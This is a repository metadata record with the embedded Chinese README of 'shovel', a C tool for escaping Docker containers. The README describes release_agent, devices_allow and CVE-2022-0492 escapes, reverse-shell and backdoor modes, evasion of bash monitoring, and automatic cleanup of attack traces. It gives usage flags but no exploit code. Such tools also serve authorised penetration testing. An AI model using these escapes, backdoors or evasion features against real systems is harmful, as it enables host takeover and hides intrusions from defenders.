{"id":13574047,"url":"https://github.com/SPuerBRead/shovel","last_synced_at":"2025-04-04T14:31:30.970Z","repository":{"id":37804495,"uuid":"506284092","full_name":"SPuerBRead/shovel","owner":"SPuerBRead","description":"Docker容器逃逸工具（Docker Escape Tools）","archived":false,"fork":false,"pushed_at":"2022-12-15T10:18:07.000Z","size":1005,"stargazers_count":262,"open_issues_count":0,"forks_count":24,"subscribers_count":6,"default_branch":"master","last_synced_at":"2024-11-05T09:43:37.424Z","etag":null,"topics":["capability","container","docker","escape","security","security-tools"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SPuerBRead.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-22T14:33:47.000Z","updated_at":"2024-11-04T01:50:57.000Z","dependencies_parsed_at":"2022-08-08T22:01:15.914Z","dependency_job_id":null,"html_url":"https://github.com/SPuerBRead/shovel","commit_stats":null,"previous_names":[],"tags_count":5,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SPuerBRead%2Fshovel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SPuerBRead%2Fshovel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SPuerBRead%2Fshovel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SPuerBRead%2Fshovel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SPuerBRead","download_url":"https://codeload.github.com/SPuerBRead/shovel/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247194058,"owners_count":20899424,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["capability","container","docker","escape","security","security-tools"],"created_at":"2024-08-01T15:00:45.631Z","updated_at":"2025-04-04T14:31:30.287Z","avatar_url":"https://github.com/SPuerBRead.png","language":"C","funding_links":[],"categories":["C","蓝队工具"],"sub_categories":["红队工具"],"readme":"## Shovel\n\nDocker容器逃逸工具\n\n1、通过mount命令逃逸触发告警？\n\n2、unshare命令发现没有-C参数？\n\n3、机器上没有各种语言的执行环境？\n\n4、逃逸程序太大不好下载？\n\n遇到以上问题那就用下这个程序吧，原理上就是逃逸的那一堆shell脚本，换成系统调用，绕过bash的监控\n\n![](./img/shovel.gif)\n\n## 功能\n\n* 支持的逃逸方式\n  * release_agent\n  * device_allow\n  * cve-2022-0492\n\n\n* 支持的存储驱动\n  * device_mapper\n  * aufs\n  * btrfs\n  * vfs\n  * zfs\n  * overlayfs\n\n\n* 支持的利用类型\n  * exec: 在宿主机执行命令\n  * shell: 获取宿主机shell\n  * reverse: 反弹shell\n  * backdoor: 向宿主机植入后门并运行\n\n\n* 自动清理攻击痕迹\n\n## 使用方式\n\n```text\nusage: shovel [options ...]\n\nOptions:\nOptions of program\n    -h, --help                           show help message\n    -v, --version                        show program version\nOptions of escape\n    -r, --release-agent                  escape by release-agent\n    -d, --devices-allow                  escape by devices-allow\n    -u, --cve-2022-0492                  get cap_sys_admin by cve-2022-0492 and return new namespace bash\nOptions of other\n    -p, --container_path=xxx             manually specify path of container in host,use this parameter if program can't get it automatically\n    -m, --mode=xxx                       the mode that needs to be returned after a successful escape { exec | shell | reverse | backdoor }\n    -c, --command=xxx                    set command in exec mode\n    -I, --ip                             set ip address in reverse mode\n    -P, --port                           set port in reverse mode\n    -B, --backdoor_path                  set backdoor file path\n    -y, --assumeyes                      automatically answer yes for all questions\nMode (-m) type guide\n    exec:     run a single command and return the result\n    shell:    get host shell in current console\n    reverse:  reverse shell to remote listening address\n    backdoor: put a backdoor to the host and execute\n```\n## 编译\n\n编译时尽量用低版本glibc，高版本glibc编译到老系统上没办法运行\n\n编译环境如果是Linux 4.6前，没有CLONE_NEWCGROUP常量,或者其他情况编译时出现以下报错\n\n```text\n/docker/opt/shovel/exploits/cve_2022_0492.c:30: error: 'CLONE_NEWCGROUP' undeclared (first use in this function)\n```\n\n可以用[no_0492](https://github.com/SPuerBRead/shovel/tree/no_0492) 这个branch的代码，这个版本的代码不包含cve-2022-0492的exp，换掉了一些c99的写法，使其尽可能在老机器上可以编译\n\n\n\n```shell\ncmake .\nmake\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSPuerBRead%2Fshovel","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FSPuerBRead%2Fshovel","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSPuerBRead%2Fshovel/lists"}